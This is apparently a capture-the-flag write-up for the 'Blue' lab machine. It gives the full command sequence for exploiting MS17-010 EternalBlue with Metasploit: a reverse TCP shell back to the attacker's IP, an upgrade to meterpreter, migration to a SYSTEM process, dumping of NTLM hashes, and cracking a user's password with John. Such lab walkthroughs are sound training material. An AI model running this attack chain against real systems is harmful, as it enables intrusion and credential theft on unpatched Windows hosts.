Name
🔗 Blue
Description
📝 Deploy & hack into a Windows machine, leveraging common misconfigurations issues.
Target IP
🎯
10.10.177.175
nmap -p1-1000 10.10.177.175
nmap -sV -p445 10.10.177.175
nmap --script smb-vuln-ms17-010 -p445 10.10.177.175
msfconsole -q
search ms17-010
use exploit/windows/smb/ms17_010_eternalblue
set payload windows/x64/shell/reverse_tcp
set RHOSTS 10.10.177.175
set LHOST 10.18.65.48
# LHOST = tun0 VPN interface IP
run
background # or CTRL+Z
- Used payload was
windows/x64/shell/reverse_tcp
, so convert the shell to ameterpreter
shell.
search shell_to_meterpreter
use post/multi/manage/shell_to_meterpreter
sessions
set SESSION 2
run
sessions 5
getuid
Server username: NT AUTHORITY\SYSTEM
ps
- My process may not run as
SYSTEM
user. Select aPID
(process ID) with theNT AUTHORITY\SYSTEM
user, and migrate my process to that one.e.g.
1284 - spoolsv.exe
migrate 1284
hashdump
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Jon:1000:aad3b435b51404eeaad3b435b51404ee:ffb43f0de35be4d9917ac0cc8ad57f8d:::
<Username>:<User ID>:<LM hash>:<NT hash>:<Comment>:<Home Dir>:
aad3b435b51404eeaad3b435b51404ee
is the LM hash for no password.
echo 'ffb43f0de35be4d9917ac0cc8ad57f8d' > jonhash.txt
john --format=nt --wordlist=/usr/share/wordlists/rockyou.txt jonhash.txt
ffb43f0de35be4d9917ac0cc8ad57f8d
is the NTLM hash for alqfna22
.
Jon's credentials are jon
:alqfna22
.
- In the
meterpreter
session
cd C:\\
dir
cat flag1.txt
cd C:/Windows/System32/config
cat flag2.txt
cd C:\\Users\\
dir
cd Jon
cd Documents
cat flag3.txt